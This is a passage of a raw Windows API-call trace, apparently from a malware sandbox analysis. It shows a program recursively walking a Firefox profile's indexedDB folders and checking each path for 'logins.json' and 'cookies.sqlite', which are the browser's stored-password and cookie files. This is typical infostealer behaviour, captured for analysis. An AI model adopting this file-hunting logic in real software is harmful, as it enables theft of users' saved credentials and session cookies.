HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\" [0161.081] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\", lpString2="818200132aebmoouht" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht" [0161.081] VirtualQuery (in: lpAddress=0x925e58, lpBuffer=0x2deac8, dwLength=0x1c | out: lpBuffer=0x2deac8*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.081] GetProcessHeap () returned 0x8e0000 [0161.081] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925e58 | out: hHeap=0x8e0000) returned 1 [0161.081] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht") returned 140 [0161.081] lstrlenW (lpString="") returned 0 [0161.081] GetProcessHeap () returned 0x8e0000 [0161.081] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11a) returned 0x925e58 [0161.081] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht" [0161.081] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht", lpString2="" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht" [0161.081] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht") returned 140 [0161.081] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht") returned 140 [0161.082] lstrlenW (lpString="\\*.*") returned 4 [0161.082] GetProcessHeap () returned 0x8e0000 [0161.082] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x122) returned 0x918f78 [0161.082] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht" [0161.082] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\*.*" [0161.082] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\*.*", lpFindFileData=0x2de8a8 | out: lpFindFileData=0x2de8a8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb70ff8d0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb70ff8d0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb70ff8d0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2d007a, dwReserved1=0x610073, cFileName=".", cAlternateFileName="")) returned 0x8f9bc0 [0161.082] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.082] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de8a8 | out: lpFindFileData=0x2de8a8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb70ff8d0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb70ff8d0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb70ff8d0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2d007a, dwReserved1=0x610073, cFileName="..", cAlternateFileName="")) returned 1 [0161.082] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.082] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.082] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de8a8 | out: lpFindFileData=0x2de8a8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb70ff8d0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb70ff8d0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb70ff8d0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2d007a, dwReserved1=0x610073, cFileName="..", cAlternateFileName="")) returned 0 [0161.082] FindClose (in: hFindFile=0x8f9bc0 | out: hFindFile=0x8f9bc0) returned 1 [0161.082] VirtualQuery (in: lpAddress=0x918f78, lpBuffer=0x2de85c, dwLength=0x1c | out: lpBuffer=0x2de85c*(BaseAddress=0x918000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x30000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.082] GetProcessHeap () returned 0x8e0000 [0161.082] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x918f78 | out: hHeap=0x8e0000) returned 1 [0161.082] VirtualQuery (in: lpAddress=0x925e58, lpBuffer=0x2de85c, dwLength=0x1c | out: lpBuffer=0x2de85c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.082] GetProcessHeap () returned 0x8e0000 [0161.082] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925e58 | out: hHeap=0x8e0000) returned 1 [0161.082] VirtualQuery (in: lpAddress=0x918e50, lpBuffer=0x2dead4, dwLength=0x1c | out: lpBuffer=0x2dead4*(BaseAddress=0x918000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x30000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.082] GetProcessHeap () returned 0x8e0000 [0161.082] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x918e50 | out: hHeap=0x8e0000) returned 1 [0161.082] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb") returned 121 [0161.082] lstrlenW (lpString="\\") returned 1 [0161.082] GetProcessHeap () returned 0x8e0000 [0161.082] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xf6) returned 0x925e58 [0161.082] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb" [0161.082] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\" [0161.082] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\") returned 122 [0161.082] lstrlenW (lpString="818200132aebmoouht") returned 18 [0161.082] GetProcessHeap () returned 0x8e0000 [0161.083] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11a) returned 0x918e50 [0161.083] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\" [0161.083] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\", lpString2="818200132aebmoouht" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht" [0161.083] VirtualQuery (in: lpAddress=0x925e58, lpBuffer=0x2deac8, dwLength=0x1c | out: lpBuffer=0x2deac8*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.083] GetProcessHeap () returned 0x8e0000 [0161.083] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925e58 | out: hHeap=0x8e0000) returned 1 [0161.083] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht", lpSrch="logins.json") returned 0x0 [0161.083] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht", lpSrch="cookies.sqlite") returned 0x0 [0161.083] VirtualQuery (in: lpAddress=0x918e50, lpBuffer=0x2dead4, dwLength=0x1c | out: lpBuffer=0x2dead4*(BaseAddress=0x918000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x30000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.083] GetProcessHeap () returned 0x8e0000 [0161.083] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x918e50 | out: hHeap=0x8e0000) returned 1 [0161.083] FindNextFileW (in: hFindFile=0x8f9b80, lpFindFileData=0x2deb20 | out: lpFindFileData=0x2deb20*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb701b090, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb81a92d0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0xa0000, dwReserved0=0x2a, dwReserved1=0x0, cFileName="818200132aebmoouht.sqlite", cAlternateFileName="818200~1.SQL")) returned 1 [0161.083] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb") returned 121 [0161.083] lstrlenW (lpString="\\") returned 1 [0161.083] GetProcessHeap () returned 0x8e0000 [0161.083] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xf6) returned 0x925e58 [0161.083] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb" [0161.083] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\" [0161.083] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\") returned 122 [0161.083] lstrlenW (lpString="818200132aebmoouht.sqlite") returned 25 [0161.083] GetProcessHeap () returned 0x8e0000 [0161.083] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x128) returned 0x918e50 [0161.083] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\" [0161.083] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\", lpString2="818200132aebmoouht.sqlite" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" [0161.083] VirtualQuery (in: lpAddress=0x925e58, lpBuffer=0x2deac8, dwLength=0x1c | out: lpBuffer=0x2deac8*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.083] GetProcessHeap () returned 0x8e0000 [0161.083] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925e58 | out: hHeap=0x8e0000) returned 1 [0161.083] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite", lpSrch="logins.json") returned 0x0 [0161.083] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite", lpSrch="cookies.sqlite") returned 0x0 [0161.083] VirtualQuery (in: lpAddress=0x918e50, lpBuffer=0x2dead4, dwLength=0x1c | out: lpBuffer=0x2dead4*(BaseAddress=0x918000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x30000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.083] GetProcessHeap () returned 0x8e0000 [0161.083] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x918e50 | out: hHeap=0x8e0000) returned 1 [0161.083] FindNextFileW (in: hFindFile=0x8f9b80, lpFindFileData=0x2deb20 | out: lpFindFileData=0x2deb20*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb701b090, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb81a92d0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0xa0000, dwReserved0=0x2a, dwReserved1=0x0, cFileName="818200132aebmoouht.sqlite", cAlternateFileName="818200~1.SQL")) returned 0 [0161.084] FindClose (in: hFindFile=0x8f9b80 | out: hFindFile=0x8f9b80) returned 1 [0161.084] VirtualQuery (in: lpAddress=0x925d50, lpBuffer=0x2dead4, dwLength=0x1c | out: lpBuffer=0x2dead4*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.084] GetProcessHeap () returned 0x8e0000 [0161.084] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925d50 | out: hHeap=0x8e0000) returned 1 [0161.084] VirtualQuery (in: lpAddress=0x925c50, lpBuffer=0x2dead4, dwLength=0x1c | out: lpBuffer=0x2dead4*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.084] GetProcessHeap () returned 0x8e0000 [0161.084] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925c50 | out: hHeap=0x8e0000) returned 1 [0161.084] VirtualQuery (in: lpAddress=0x925b50, lpBuffer=0x2ded4c, dwLength=0x1c | out: lpBuffer=0x2ded4c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.084] GetProcessHeap () returned 0x8e0000 [0161.084] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925b50 | out: hHeap=0x8e0000) returned 1 [0161.084] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home") returned 117 [0161.084] lstrlenW (lpString="\\") returned 1 [0161.084] GetProcessHeap () returned 0x8e0000 [0161.084] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xee) returned 0x925a58 [0161.084] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home" [0161.084] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\" [0161.084] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\") returned 118 [0161.084] lstrlenW (lpString="idb") returned 3 [0161.084] GetProcessHeap () returned 0x8e0000 [0161.084] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xf4) returned 0x925b50 [0161.084] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\" [0161.084] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\", lpString2="idb" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb" [0161.084] VirtualQuery (in: lpAddress=0x925a58, lpBuffer=0x2ded40, dwLength=0x1c | out: lpBuffer=0x2ded40*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.084] GetProcessHeap () returned 0x8e0000 [0161.084] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925a58 | out: hHeap=0x8e0000) returned 1 [0161.084] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb", lpSrch="logins.json") returned 0x0 [0161.084] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb", lpSrch="cookies.sqlite") returned 0x0 [0161.084] VirtualQuery (in: lpAddress=0x925b50, lpBuffer=0x2ded4c, dwLength=0x1c | out: lpBuffer=0x2ded4c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.084] GetProcessHeap () returned 0x8e0000 [0161.084] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925b50 | out: hHeap=0x8e0000) returned 1 [0161.084] FindNextFileW (in: hFindFile=0x8f9b40, lpFindFileData=0x2ded98 | out: lpFindFileData=0x2ded98*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb8110d50, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb8110d50, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="idb", cAlternateFileName="")) returned 0 [0161.084] FindClose (in: hFindFile=0x8f9b40 | out: hFindFile=0x8f9b40) returned 1 [0161.085] VirtualQuery (in: lpAddress=0x925958, lpBuffer=0x2ded4c, dwLength=0x1c | out: lpBuffer=0x2ded4c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.085] GetProcessHeap () returned 0x8e0000 [0161.085] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925958 | out: hHeap=0x8e0000) returned 1 [0161.085] VirtualQuery (in: lpAddress=0x925860, lpBuffer=0x2ded4c, dwLength=0x1c | out: lpBuffer=0x2ded4c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.085] GetProcessHeap () returned 0x8e0000 [0161.085] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925860 | out: hHeap=0x8e0000) returned 1 [0161.085] VirtualQuery (in: lpAddress=0x925768, lpBuffer=0x2defc4, dwLength=0x1c | out: lpBuffer=0x2defc4*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.085] GetProcessHeap () returned 0x8e0000 [0161.085] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925768 | out: hHeap=0x8e0000) returned 1 [0161.085] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB") returned 97 [0161.085] lstrlenW (lpString="\\") returned 1 [0161.085] GetProcessHeap () returned 0x8e0000 [0161.085] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc6) returned 0x925698 [0161.085] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB" [0161.085] lstrcatW (in: 